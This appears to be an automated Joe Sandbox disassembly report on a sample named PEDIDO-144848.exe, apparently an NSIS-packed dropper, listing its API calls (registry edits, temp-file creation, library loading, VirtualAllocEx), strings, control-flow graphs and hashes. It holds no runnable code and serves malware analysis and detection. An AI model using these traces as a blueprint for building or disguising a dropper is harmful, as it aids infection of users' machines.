                                                        • Opcode ID: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                        • Instruction ID: 3261349ff2f4a6e0e52cb66aedc5a428c749111a9fc88119453a55b84fe8b48b
                                                        • Opcode Fuzzy Hash: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                        • Instruction Fuzzy Hash: 9A510671940215AFDB119F60DE89B9E7BB8EB44364F20413BF904B62D1D7BC8D408B9D

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                        • GetLastError.KERNEL32 ref: 004054D6
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
                                                        • GetLastError.KERNEL32 ref: 004054F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                        • API String ID: 3449924974-2230009264
                                                        • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                        • Instruction ID: 09fe99030eccae78cb9d2ce19bbf77f9f972de75acbbd1990c032815ad2a971a
                                                        • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                        • Instruction Fuzzy Hash: 2F010871D14259EADF119BA4C944BEFBFB8EB14315F00417AE904B6280E378A644CFAA

                                                        Control-flow Graph

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D98
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                        • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Times New Roman
                                                        • API String ID: 3808545654-927190056
                                                        • Opcode ID: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                        • Instruction ID: 37723da549b7de6e047f5ddf6566bf04a0332ae81d9da388354d8b2e576e77f8
                                                        • Opcode Fuzzy Hash: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                        • Instruction Fuzzy Hash: 3A015272948340AFE7006B70AE49F9A3FF4AB55315F10847AF241B62E2C6B904569B3E

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                        • wsprintfA.USER32 ref: 0040611B
                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                        • Instruction ID: e39d6de12310bdbc02ec2e887020ee50980fcceaee6e7f6f8e64b4e94942106c
                                                        • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                        • Instruction Fuzzy Hash: 80F0FC30A40115A6EF1497A4DC0DFEB365CAB08305F140176A547E51D2D5B8E9248B69

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 489 402f33-402f47 490 402f50-402f59 489->490 491 402f49 489->491 492 402f62-402f67 490->492 493 402f5b 490->493 491->490 494 402f77-402f84 call 403122 492->494 495 402f69-402f72 call 403138 492->495 493->492 499 403110 494->499 500 402f8a-402f8e 494->500 495->494 501 403112-403113 499->501 502 402f94-402fba GetTickCount 500->502 503 4030bb-4030bd 500->503 506 40311b-40311f 501->506 507 402fc0-402fc8 502->507 508 403118 502->508 504 4030fd-403100 503->504 505 4030bf-4030c2 503->505 511 403102 504->511 512 403105-40310e call 403122 504->512 505->508 513 4030c4 505->513 509 402fca 507->509 510 402fcd-402fdb call 403122 507->510 508->506 509->510 510->499 522 402fe1-402fea 510->522 511->512 512->499 523 403115 512->523 516 4030c7-4030cd 513->516 519 4030d1-4030df call 403122 516->519 520 4030cf 516->520 519->499 526 4030e1-4030ed call 405aba 519->526 520->519 525 402ff0-403010 call 40621c 522->525 523->508 531 4030b3-4030b5 525->531 532 403016-403029 GetTickCount 525->532 533 4030b7-4030b9 526->533 534 4030ef-4030f9 526->534 531->501 535 40302b-403033 532->535 536 40306e-403070 532->536 533->501 534->516 537 4030fb 534->537 538 403035-403039 535->538 539 40303b-40306b MulDiv wsprintfA call 404fb9 535->539 540 403072-403076 536->540 541 4030a7-4030ab 536->541 537->508 538->536 538->539 539->536 542 403078-40307f call 405aba 540->542 543 40308d-403098 540->543 541->507 544 4030b1 541->544 549 403084-403086 542->549 547 40309b-40309f 543->547 544->508 547->525 550 4030a5 547->550 549->533 551 403088-40308b 549->551 550->508 551->547
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 551687249-2449383134
                                                        • Opcode ID: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                        • Instruction ID: c8fbb3e8d9104581ad396ff7879acfc5b753e67115e275f424ba67d933986381
                                                        • Opcode Fuzzy Hash: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                        • Instruction Fuzzy Hash: 6551A27280121AABCB10DF65DA44A9F7BB8EF44756F10413BF800B72C5C7788E51DBAA

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 552 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 559 40295e-40296d 552->559 560 40241f-402427 552->560 562 402437-40243a 560->562 563 402429-402436 call 402ace lstrlenA 560->563 564 40243c-40244d call 402aac 562->564 565 40244e-402451 562->565 563->562 564->565 570 402462-402476 RegSetValueExA 565->570 571 402453-40245d call 402f33 565->571 574 402478 570->574 575 40247b-402555 RegCloseKey 570->575 571->570 574->575 575->559 577 402729-402730 575->577 577->559
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402411
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402431
                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246E
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp
                                                        • API String ID: 1356686001-127197393
                                                        • Opcode ID: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                        • Instruction ID: 00e854f1b6d20388f4b464fcc1b804607db5fe0ac9957b4d3390b69bb90c797e
                                                        • Opcode Fuzzy Hash: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                        • Instruction Fuzzy Hash: 3921A1B1E00109BEEB00EFA4DE49EAF7A78EB50358F20403AF505B61D1C6B85D019B28

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 578 405a42-405a4c 579 405a4d-405a78 GetTickCount GetTempFileNameA 578->579 580 405a87-405a89 579->580 581 405a7a-405a7c 579->581 583 405a81-405a84 580->583 581->579 582 405a7e 581->582 582->583
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405A56
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A70
                                                        Strings
                                                        • "C:\Users\user\Desktop\PEDIDO-144848.exe", xrefs: 00405A42
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A45
                                                        • nsa, xrefs: 00405A4D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-2796443484
                                                        • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                        • Instruction ID: a3d8867ec022398f00e7cc0b64f9ef92c2764b579e17a6718397eb4594f2c545
                                                        • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                        • Instruction Fuzzy Hash: 07F0E2327082047BDB108F55EC44B9B7B9CDF91750F10C037FE049A180D2B198448F59

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 584 402b0e-402b37 RegOpenKeyExA 585 402ba2-402ba6 584->585 586 402b39-402b44 584->586 587 402b5f-402b6f RegEnumKeyA 586->587 588 402b71-402b83 RegCloseKey call 406139 587->588 589 402b46-402b49 587->589 597 402b85-402b94 588->597 598 402ba9-402baf 588->598 590 402b96-402b99 RegCloseKey 589->590 591 402b4b-402b5d call 402b0e 589->591 593 402b9f-402ba1 590->593 591->587 591->588 593->585 597->585 598->593 599 402bb1-402bbf RegDeleteKeyA 598->599 599->593 600 402bc1 599->600 600->585
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402B2F
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                        • Instruction ID: e8770432982ab8decd1ca443e4f50ff6a20a1eaa2a88b85c41c9a6e6fa4e92e0
                                                        • Opcode Fuzzy Hash: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                        • Instruction Fuzzy Hash: 49117F36900109FFEF119F90DE89DAE3B7DEB55384F004076FA05B10A0D3B8AE51AB69

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 602 100016bd-100016f9 call 10001a5d 606 1000180a-1000180c 602->606 607 100016ff-10001703 602->607 608 10001705-1000170b call 100021b0 607->608 609 1000170c-10001719 call 100021fa 607->609 608->609 614 10001749-10001750 609->614 615 1000171b-10001720 609->615 616 10001770-10001774 614->616 617 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 614->617 618 10001722-10001723 615->618 619 1000173b-1000173e 615->619 623 100017b2-100017b8 call 100023da 616->623 624 10001776-100017b0 call 10001559 call 100023da 616->624 639 100017b9-100017bd 617->639 621 10001725-10001726 618->621 622 1000172b-1000172c call 100027e8 618->622 619->614 625 10001740-10001741 call 10002aa3 619->625 627 10001733-10001739 call 10002589 621->627 628 10001728-10001729 621->628 634 10001731 622->634 623->639 624->639 637 10001746 625->637 643 10001748 627->643 628->614 628->622 634->637 637->643 644 100017fa-10001801 639->644 645 100017bf-100017cd call 100023a0 639->645 643->614 644->606 650 10001803-10001804 GlobalFree 644->650 652 100017e5-100017ec 645->652 653 100017cf-100017d2 645->653 650->606 652->644 655 100017ee-100017f9 call 100014e2 652->655 653->652 654 100017d4-100017dc 653->654 654->652 656 100017de-100017df FreeLibrary 654->656 655->644 656->652
                                                        APIs
                                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                        • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                          • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                          • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                                        • String ID:
                                                        • API String ID: 1791698881-3916222277
                                                        • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                        • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                        • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                        • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 659 405900-40591b call 405da0 call 4058ab 664 405921-40592e call 40600b 659->664 665 40591d-40591f 659->665 669 405930-405934 664->669 670 40593a-40593c 664->670 666 405973-405975 665->666 669->665 671 405936-405938 669->671 672 405952-40595b lstrlenA 670->672 671->665 671->670 673 40595d-405971 call 405812 GetFileAttributesA 672->673 674 40593e-405945 call 4060a4 672->674 673->666 679 405947-40594a 674->679 680 40594c-40594d call 405859 674->680 679->665 679->680 680->672
                                                        APIs
                                                          • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Rse Setup,NSIS Error), ref: 00405DAD
                                                          • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405953
                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\), ref: 00405963
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 3248276644-2214159804
                                                        APIs
                                                        • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 0040202A
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                          • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,758B23A0), ref: 00405015
                                                          • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 0040203A
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2987980305-0
                                                        APIs
                                                          • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                          • Part of subcall function 0040547F: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\slavelivets,00000000,00000000,000000F0), ref: 0040163C
                                                        Strings
                                                        • C:\Users\user\slavelivets, xrefs: 00401631
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\slavelivets
                                                        • API String ID: 1892508949-1403250623
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000002,00405ECC,00000000,00000002,?,00000002,000B4E1D,?,00405ECC,80000002,Software\Microsoft\Windows\CurrentVersion,000B4E1D,Call,00856D95), ref: 00405CB0
                                                        • RegQueryValueExA.KERNELBASE(000B4E1D,?,00000000,00405ECC,000B4E1D,00405ECC), ref: 00405CD1
                                                        • RegCloseKey.KERNELBASE(?), ref: 00405CF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(00000000), ref: 100028A7
                                                        • GetLastError.KERNEL32 ref: 100029AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: AllocErrorLastVirtual
                                                        • String ID:
                                                        • API String ID: 497505419-0
                                                        APIs
                                                          • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000064F,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                          • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000064F,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402396
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValue
                                                        APIs
                                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: EnvironmentExpandStringslstrcmp
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                          • Part of subcall function 004060CB: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                          • Part of subcall function 004060CB: wsprintfA.USER32 ref: 0040611B
                                                          • Part of subcall function 004060CB: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00405A17
                                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405A39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403173,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405502
                                                        • GetLastError.KERNEL32 ref: 00405510
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: wsprintf
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                          • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        APIs
                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                        • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                                        • Opcode Fuzzy Hash: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                        • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                                        APIs
                                                        • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: PathSearch
                                                        • String ID:
                                                        • API String ID: 2203818243-0
                                                        • Opcode ID: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                        • Instruction ID: e4e3c42305c0b2198e0aecdca264a5a1b937f2a52f25dfaad176198492f8ea82
                                                        • Opcode Fuzzy Hash: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                        • Instruction Fuzzy Hash: CFE026B2304111AFE740DF68DE48EAA3B98DB10368F30453AF151F60C0E2BA9A41A769
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,0000064F,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
